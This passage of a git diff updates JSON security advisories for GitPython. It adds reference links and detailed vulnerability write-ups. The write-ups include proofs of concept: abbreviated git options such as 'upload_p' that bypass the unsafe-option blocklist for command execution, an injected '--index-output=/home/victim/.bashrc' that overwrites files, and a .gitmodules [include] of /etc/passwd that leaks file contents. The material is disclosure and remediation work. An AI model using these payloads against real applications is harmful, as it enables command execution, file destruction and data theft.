git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", + "details": "## Command injection via long-option prefix abbreviation bypassing `check_unsafe_options` (incomplete fix of CVE-2026-42215 / GHSA-rpm5-65cw-6hj4)\n\n**Component:** gitpython-developers/GitPython (PyPI: GitPython)\n**Affected:** all versions carrying the 3.1.47 blocklist fix, through current `main` (verified at commit `20c5e275`, `3.1.50-42`)\n**Reporter:** hackkim\n\n### Summary\n\nThe 3.1.47 fix for CVE-2026-42215 blocks dangerous git options (`--upload-pack`, `--config`, `-c`, `-u` for clone; `--upload-pack` for fetch/pull; `--receive-pack`, `--exec` for push) so callers cannot reach command-executing options unless they pass `allow_unsafe_options=True`.\n\nThe fix canonicalizes an option name along **one** axis (underscore→hyphen via `dashify`) and checks it against an **exact-match** dict. It does not account for git's unambiguous long-option prefix abbreviation. Git accepts any unambiguous prefix of a long option (`--upload-p`, `--upload-pa`, `--upload-pac` all resolve to `--upload-pack`). So a kwarg key like `upload_p` canonicalizes to `upload-p`, misses the blocklist dict, and is emitted to git as `--upload-p=` → executed as `--upload-pack=` → command injection, in the default `allow_unsafe_options=False` configuration.\n\n### The asymmetry (root cause)\n\n```python\n# git/cmd.py (commit 20c5e275), lines 948-974\n@classmethod\ndef _canonicalize_option_name(cls, option):\n option_name = option.lstrip(\"-\").split(\"=\", 1)[0]\n option_tokens = option_name.split(None, 1)\n if not option_tokens:\n return \"\"\n return dashify(option_tokens[0]) # only transform: \"_\" -> \"-\"\n\n@classmethod\ndef check_unsafe_options(cls, options, unsafe_options):\n canonical_unsafe_options = {cls._canonicalize_option_name(o): o for o in unsafe_options}\n for option in options:\n unsafe_option = canonical_unsafe_options.get(cls._canonicalize_option_name(option))\n if unsafe_option is not None:\n raise UnsafeOptionError(...)\n```\n\nThe guard normalizes only `_`→`-` and does exact dict membership. Git's CLI parser accepts a broader grammar (prefix abbreviation) than the guard models, so abbreviated keys slip through and reach git as the blocked option.\n\n### Affected code (commit `20c5e275`)\n\n| Location | Role |\n|---|---|\n| `git/cmd.py:948-960` `_canonicalize_option_name` | canonicalizer — no prefix expansion |\n| `git/cmd.py:963-974` `check_unsafe_options` | exact-match dict lookup (the incomplete guard) |\n| `git/cmd.py:1511` `transform_kwarg` | emits `--=` to the CLI |\n| `git/repo/base.py:1411,1413` | clone call sites |\n| `git/remote.py:1074,1128,1201` | fetch / pull / push call sites |\n\n### Bypass keys (verified)\n\n| kwarg key | git resolves to | path | weaponizable |\n|---|---|---|---|\n| `upload_p`, `upload_pac` | `--upload-pack` | clone / fetch / pull | Yes — direct RCE |\n| `receive_p` | `--receive-pack` | push | Yes — direct RCE |\n| `exe` | `--exec` | push | Yes — direct RCE |\n| `conf`, `confi` | `--config` | clone | bypasses option blocklist; RCE needs an additional config vector (see note) |\n\n### Minimal PoC\n\nSelf-contained, no network egress (a local bare repo acts as the \"remote\"). Tested on current `main` (git 2.50.1):\n\n```python\nimport os, stat, tempfile\nfrom git import Repo\n\nwork = tempfile.mkdtemp()\nmarker = os.path.join(work, \"RCE_MARKER\")\n\n# fake \"upload-pack\" program that proves arbitrary command execution\nprog = os.path.join(work, \"evil.sh\")\nwith open(prog, \"w\") as f:\n f.write(f\"#!/bin/sh\\ntouch {marker}\\nexit 1\\n\") # exit 1 so git aborts after our code ran\nos.chmod(prog, os.stat(prog).st_mode | stat.S_IEXEC)\n\nbare = os.path.join(work, \"remote.git\")\nRepo.init(bare, bare=True)\n\n# attacker-controlled kwarg KEY 'upload_p' -> --upload-p= -> git runs \ntry:\n Repo.clone_from(bare, os.path.join(work, \"out\"), upload_p=prog)\nexcept Exception:\n pass # git aborts with GitCommandError AFTER the payload executed\n\nprint(\"RCE marker created:\", os.path.exists(marker)) # True -> command injection confirmed\n```\n\nEquivalent at the shell: `git clone --upload-p=/tmp/evil.sh src out` runs `evil.sh`.\n\nConfirmed behavior:\n- `upload_pack` (exact) → blocked; `upload_p` (abbrev) → passes guard, reaches git, executes. The fix works for the form it models but not the abbreviated form.\n- `allow_unsafe_options=True` opt-out behaves as documented (out of scope).\n\n### Honest scope note\n\nLike the parent CVE, exploitation requires a host application that flows attacker-controlled kwarg **keys** into a GitPython clone/fetch/pull/push. Where the host passes only fixed/validated keys, this is not reachable — the vulnerability is in the library's documented defense-in-depth control (`allow_unsafe_options=False`), which this variant defeats.\n\nOn the `--config` family: `conf` bypasses the option blocklist, but weaponizing `--config protocol.ext.allow=always` via an `ext::` URL is independently blocked by GitPython's protocol allowlist (`allow_unsafe_protocols=False`). The directly weaponizable family is `upload-pack` / `receive-pack` / `exec`. Reported transparently — not claiming Critical.\n\n### Suggested remediation (any one)\n\n1. **Prefix-aware matching:** reject any option whose canonical name is an unambiguous prefix of a blocked option (≈ `startswith` on the blocked canonical name, after `dashify`).\n2. **Disable abbreviation at the sink:** pass `--end-of-options` or invoke git in a way that disables long-option abbreviation.\n3. **Allowlist** option names on security-sensitive subcommands instead of a blocklist.\n\nRemediation should also cover the `-c`/`--config` family abbreviations, even though the `ext::` route is currently gated by the protocol allowlist.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-2f96-g7mh-g2hx" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-67325" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2161" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.51" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-injection-via-option-prefix-abbreviation" } ] } diff --git a/advisories/BREW-legit-CVE-2026-73619.json b/advisories/BREW-legit-CVE-2026-73619.json index 6df5a076891..ff86d11cea7 100644 --- a/advisories/BREW-legit-CVE-2026-73619.json +++ b/advisories/BREW-legit-CVE-2026-73619.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73619", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-539m-9xh6-q6rr", - "CVE-2026-73619" + "CVE-2026-73619", + "PYSEC-2026-3948" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73620.json b/advisories/BREW-legit-CVE-2026-73620.json index b909fd2fa4c..389359fb981 100644 --- a/advisories/BREW-legit-CVE-2026-73620.json +++ b/advisories/BREW-legit-CVE-2026-73620.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73620", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:40:06Z", "upstream": [ "GHSA-3f7w-8rr8-f37f", - "CVE-2026-73620" + "CVE-2026-73620", + "PYSEC-2026-3949" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73621.json b/advisories/BREW-legit-CVE-2026-73621.json index b413034d4c4..4d260e52fc3 100644 --- a/advisories/BREW-legit-CVE-2026-73621.json +++ b/advisories/BREW-legit-CVE-2026-73621.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73621", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-p538-c434-8v24", - "CVE-2026-73621" + "CVE-2026-73621", + "PYSEC-2026-3950" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73622.json b/advisories/BREW-legit-CVE-2026-73622.json index 7d84aa91c5a..eb004c57535 100644 --- a/advisories/BREW-legit-CVE-2026-73622.json +++ b/advisories/BREW-legit-CVE-2026-73622.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73622", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-94p4-4cq8-9g67", - "CVE-2026-73622" + "CVE-2026-73622", + "PYSEC-2026-3951" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73623.json b/advisories/BREW-legit-CVE-2026-73623.json index 6e8ca041f35..32619ccb085 100644 --- a/advisories/BREW-legit-CVE-2026-73623.json +++ b/advisories/BREW-legit-CVE-2026-73623.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73623", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-6p8h-3wgx-97gf", - "CVE-2026-73623" + "CVE-2026-73623", + "PYSEC-2026-3952" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-73625.json b/advisories/BREW-legit-CVE-2026-73625.json index c0739b71369..5ee8d2042d5 100644 --- a/advisories/BREW-legit-CVE-2026-73625.json +++ b/advisories/BREW-legit-CVE-2026-73625.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-73625", "published": "2026-08-14T09:13:01Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-r9mr-m37c-5fr3", - "CVE-2026-73625" + "CVE-2026-73625", + "PYSEC-2026-3953" ], "affected": [ { diff --git a/advisories/BREW-legit-CVE-2026-76217.json b/advisories/BREW-legit-CVE-2026-76217.json index 5a0e02e0644..bcfd19d85aa 100644 --- a/advisories/BREW-legit-CVE-2026-76217.json +++ b/advisories/BREW-legit-CVE-2026-76217.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76217", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-hh9p-6wh2-4mfc", - "CVE-2026-76217" + "CVE-2026-76217", + "PYSEC-2026-3841" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hh9p-6wh2-4mfc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76217" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-read-via-pathspec-from-file" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76218.json b/advisories/BREW-legit-CVE-2026-76218.json index f3435ccca93..503c522e397 100644 --- a/advisories/BREW-legit-CVE-2026-76218.json +++ b/advisories/BREW-legit-CVE-2026-76218.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76218", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-9rj7-rf2p-w77r", - "CVE-2026-76218" + "CVE-2026-76218", + "PYSEC-2026-3840" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-9rj7-rf2p-w77r" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76218" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-remote-code-execution-via-repo-init" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76219.json b/advisories/BREW-legit-CVE-2026-76219.json index d207403075c..8a2d1aec25f 100644 --- a/advisories/BREW-legit-CVE-2026-76219.json +++ b/advisories/BREW-legit-CVE-2026-76219.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76219", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-4gmw-gg2m-w46p", - "CVE-2026-76219" + "CVE-2026-76219", + "PYSEC-2026-3838" ], "affected": [ { @@ -52,7 +53,7 @@ ] }, "summary": "GitPython: Unguarded git read-tree option forwarding in IndexFile.from_tree/reset/merge_tree enables arbitrary file overwrite", - "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.\n\n---\nReported by **zx (Jace)** — GitHub: @manus-use", + "details": "## Summary\n`IndexFile.from_tree`, `IndexFile.reset` (→ from_tree) and `IndexFile.merge_tree` append caller-influenced treeish strings positionally to `git read-tree` with no unsafe-option guard, no `allow_unsafe_options` parameter, and no `--` separator. `git read-tree --index-output=` writes the resulting index to an arbitrary path, and last-occurrence-wins lets an injected `--index-output` override the method's internal temp path — clobbering an arbitrary file with a valid git-index blob. This is a distinct, never-guarded sink: commit `3af0c251` (GHSA-3f7w-8rr8-f37f) guarded only `checkout_index` and `tag`; `read_tree` was left unprotected (it is among the acknowledged unguarded call sites in that advisory's sweep but was never reported or fixed).\n\n## Root Cause\n`from_tree` (index/base.py:388), `reset` (delegates to from_tree), and `merge_tree` (index/base.py:291) call `repo.git.read_tree(*arg_list)` with no `check_unsafe_options` and no `--`. The treeish is caller-influenced and positional.\n\n## Impact\nArbitrary file overwrite / destruction at the privileges of the host process. Content is constrained to a git-index blob (not attacker-chosen, so not RCE), but the target path is fully attacker-controlled — corrupting/truncating configs or destroying files at attacker-chosen writable locations = I:H + A:H (per the skill's \"overwrite-any-path = I:H\" rule). Pure VALUE control (positional treeish). Default configuration.\n\n## Proof of Concept\n```python\nIndexFile.from_tree(repo, \"--index-output=/home/victim/.bashrc\")\n# target overwritten with a valid git-index blob (DIRC...)\n```\n\n## Attack Chain\n1. Entry: app calls `IndexFile.from_tree(repo, treeish)` / `reset(commit=…)` / `merge_tree(base=…, rhs=…)` with attacker `treeish=\"--index-output=/home/victim/.bashrc\"`.\n2. Check: NONE — the methods have no `allow_unsafe_options` and never call `check_unsafe_options`.\n3. Sink: `repo.git.read_tree(*arg_list)` — no `--`. argv (from_tree, observed): `['git','read-tree','--index-output=','--index-output=/…/victim']` (last-wins).\n4. Impact: target path created/overwritten with a valid git-index blob; existing content destroyed.\n\n## Bypass Evidence\nIndependently reproduced (gate harness): `IndexFile.from_tree(repo,'--index-output=')` → victim overwritten; before=`IMPORTANT ORIGINAL CONTENT`, after starts `DIRC\\x00\\x00\\x00\\x02…` (destructive clobber, valid index blob). `reset(commit=…)` and both `merge_tree` positionals verified. Fix-commit read: `3af0c251` touched only `checkout_index`+`tag`; `read_tree` untouched on HEAD.\n\n## Affected Versions\n`GitPython <= 3.1.57` (sinks present verbatim on the latest release tag).\n\n## Suggested Fix\nAdd a `check_unsafe_options` guard (with an `allow_unsafe_options` parameter) to `from_tree`/`reset`/`merge_tree`, and/or place a `--` separator before the positional treeish arguments; block `--index-output` (a path-taking option) on this sink.", "severity": [ { "type": "CVSS_V3", @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-4gmw-gg2m-w46p" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76219" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-arbitrary-file-overwrite-via-read-tree" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76220.json b/advisories/BREW-legit-CVE-2026-76220.json index a7543222c5c..73561d02a3d 100644 --- a/advisories/BREW-legit-CVE-2026-76220.json +++ b/advisories/BREW-legit-CVE-2026-76220.json @@ -2,10 +2,11 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76220", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-wvpp-8hx9-p66j", - "CVE-2026-76220" + "CVE-2026-76220", + "PYSEC-2026-3843" ], "affected": [ { @@ -64,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-wvpp-8hx9-p66j" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76220" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2204" @@ -79,6 +84,10 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-command-execution-via-split-single-char-options" } ] } diff --git a/advisories/BREW-legit-CVE-2026-76221.json b/advisories/BREW-legit-CVE-2026-76221.json index 2b8b58bdac2..d6b27a9326c 100644 --- a/advisories/BREW-legit-CVE-2026-76221.json +++ b/advisories/BREW-legit-CVE-2026-76221.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76221", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-jm78-9fvv-mhgr", "CVE-2026-76221", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-legit-CVE-2026-76222.json b/advisories/BREW-legit-CVE-2026-76222.json index 150816c9f16..944fd237ae7 100644 --- a/advisories/BREW-legit-CVE-2026-76222.json +++ b/advisories/BREW-legit-CVE-2026-76222.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-76222", "published": "2026-08-20T09:05:37Z", - "modified": "2026-09-05T09:11:40Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "GHSA-hmq2-w58f-27jc", "CVE-2026-76222", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "gitpython", - "subject_version": "3.1.61", - "key": "pkg:pypi/gitpython@3.1.61", - "resource": "gitpython" - }, { "strategy": "registry", "ecosystem": "PyPI", @@ -73,6 +65,10 @@ "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/security/advisories/GHSA-hmq2-w58f-27jc" }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-76222" + }, { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/pull/2202" @@ -92,6 +88,14 @@ { "type": "WEB", "url": "https://github.com/gitpython-developers/GitPython/releases/tag/3.1.58" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/gitpython/PYSEC-2026-3784.yaml" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gitpython-before-path-traversal-via-gitmodules-submodule-name" } ] } diff --git a/advisories/BREW-legit-CVE-2026-78675.json b/advisories/BREW-legit-CVE-2026-78675.json index 690deba9287..1a443af697e 100644 --- a/advisories/BREW-legit-CVE-2026-78675.json +++ b/advisories/BREW-legit-CVE-2026-78675.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-legit-CVE-2026-78675", "published": "2026-09-04T09:19:02Z", - "modified": "2026-09-05T09:12:41Z", + "modified": "2026-09-10T19:41:30Z", "upstream": [ "PYSEC-2026-3785", "CVE-2026-78675", @@ -52,21 +52,50 @@ } ] }, - "details": "GitPython before 3.1.59 fails to disable merge_includes when parsing .gitmodules, allowing attackers to disclose local file content by including arbitrary file paths via [include] directives. Attackers can craft a malicious .gitmodules file with include directives pointing to sensitive files; when repo.submodules is accessed, GitConfigParser raises MissingSectionHeaderError embedding the target file's first line verbatim in the exception message.", + "summary": "GitPython: Arbitrary local file content disclosure via [include] directive in untrusted .gitmodules (SubmoduleConfigParser never disables merge_includes)", + "details": "# [HIGH] Arbitrary local file content disclosure via `[include]` directive in untrusted `.gitmodules` (`SubmoduleConfigParser` never disables `merge_includes`)\n\n- **CWE:** CWE-200 (Exposure of Sensitive Information) / CWE-73 (External Control of File Name or Path)\n- **Affected component:** `git/objects/submodule/base.py`, `Submodule._config_parser()` (~line 273) constructing `SubmoduleConfigParser(fp_module, read_only=read_only)`; `git/config.py`, `GitConfigParser.__init__` (`merge_includes` default), `GitConfigParser.read()`/`_included_paths()` (include-path resolution, ~lines 630-685), `GitConfigParser._read()` (~line 493-498, `MissingSectionHeaderError`)\n- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)\n\n## Reachability\n`GitConfigParser.__init__` defaults `merge_includes=True`: any config file it parses has its `[include]` (and, when a `repo=` is supplied, `[includeIf ...]`) directives followed and merged in. The maintainers already recognized this as dangerous for one specific case and fixed it in commit `41ecc6a4` (\"Disable merge_includes in config writers\"), which passes `merge_includes=False` when `Repo.config_writer()` builds its parser (`git/repo/base.py`).\n\nThat fix never touched `Submodule._config_parser()`. This method builds the parser used for **every** read of a repo's submodule configuration — `repo.submodules`, `Submodule.iter_items()`, `Submodule.config()` — via `SubmoduleConfigParser(fp_module, read_only=read_only)`, passing neither `merge_includes=False` nor `repo=`. The `True` class default is therefore inherited unchanged, and `fp_module` here is `.gitmodules` — **the single most attacker-controlled config file in the entire codebase**, since it ships verbatim as tracked content inside any cloned repository.\n\n`GitConfigParser.read()`'s include-path resolution (~line 662-680) performs no containment check: `osp.isabs(include_path)` short-circuits the path join entirely for an absolute path, and a relative path is joined with `osp.join(osp.dirname(file_path), include_path)` / `osp.normpath()`'d with no check that the result stays under the repository. `~` is expanded via `osp.expanduser`. The only gate before opening is `os.access(include_path, os.R_OK)` — a readability check, not a path restriction.\n\nOnce opened, `GitConfigParser._read()` parses the target file as git-config INI. If the first non-blank/non-comment line is not a `[section]` header — true of virtually any non-gitconfig file (source code, `/etc/passwd`, `.env` files, credential files, logs, JSON/YAML) — it raises `configparser.MissingSectionHeaderError(fpname, lineno, line)`. Python's stdlib formats this exception's `str()` as `\"File contains no section headers.\\nfile: %r, line: %d\\n%r\" % (fpname, lineno, line)` — it embeds the **verbatim content** of that file's first line in the exception message. `Submodule.iter_items()` catches only `(IOError, BadName)`, not `configparser.Error`, so this exception propagates straight out of the ordinary, read-only `repo.submodules` call.\n\n## Root cause\nParity gap between two config-parser construction sites for the exact same footgun: `Repo.config_writer()` was hardened against `merge_includes` in 2023 (`41ecc6a4`); `Submodule._config_parser()` — which parses `.gitmodules`, content that is *always* attacker-controlled the moment a repository is cloned from an untrusted source — was never given the same treatment. (The submodule *write*-mode config parser at `git/objects/submodule/base.py` for `.git/modules//config` — a different, locally-generated file — has correctly passed `merge_includes=False` since 2022, underscoring that the omission for `.gitmodules` reads looks like an oversight rather than a considered exception.)\n\n## Exploit path\n1. Attacker crafts a repository whose `.gitmodules` contains a legitimate-looking `[submodule ...]` section plus:\n ```\n [include]\n \tpath = /etc/passwd\n ```\n (an absolute path bypasses any traversal reasoning entirely; a relative `../../../../etc/passwd`-style path works too).\n2. Victim performs the extremely common, entirely read-only operation of enumerating a cloned repo's submodules: `list(repo.submodules)` (or any `for sm in repo.submodules`) — no `update()`, `init()`, or checkout of any kind required.\n3. `SubmoduleConfigParser` (inheriting `merge_includes=True`) follows the `[include]` directive, opens `/etc/passwd`, and `GitConfigParser._read()` raises `MissingSectionHeaderError` whose message embeds `/etc/passwd`'s first line verbatim.\n4. This exception surfaces wherever the host application observes exceptions from GitPython — CI logs, error pages, exception trackers, or any dependency-scanner/code-review-bot/hosting-platform tool built on `repo.submodules` — disclosing the targeted file's first line to the attacker (directly, or indirectly via any channel that echoes the error).\n\n## Impact\nNon-blind local file content disclosure (first line) of any file readable by the victim process, triggered purely by attacker-controlled repository content and one routine, read-only GitPython call. Bounded to one line per triggering file (parsing aborts at the first `MissingSectionHeaderError`), but that line very often *is* the secret — `.env` files (`DATABASE_URL=...`, `API_KEY=...`), single-line credential/token files, `/etc/passwd`'s root entry for host fingerprinting. The primitive additionally serves as a generic error-based file-existence oracle for arbitrary host paths. This is materially stronger than the already-fixed, explicitly **blind** `GHSA-cwvm-v4w8-q58c` (\"Blind local file inclusion\", CVSS 4.0, `git/refs/symbolic.py` ref-name resolution) — that advisory's own writeup states it cannot disclose content; this one does, verbatim, via a different module 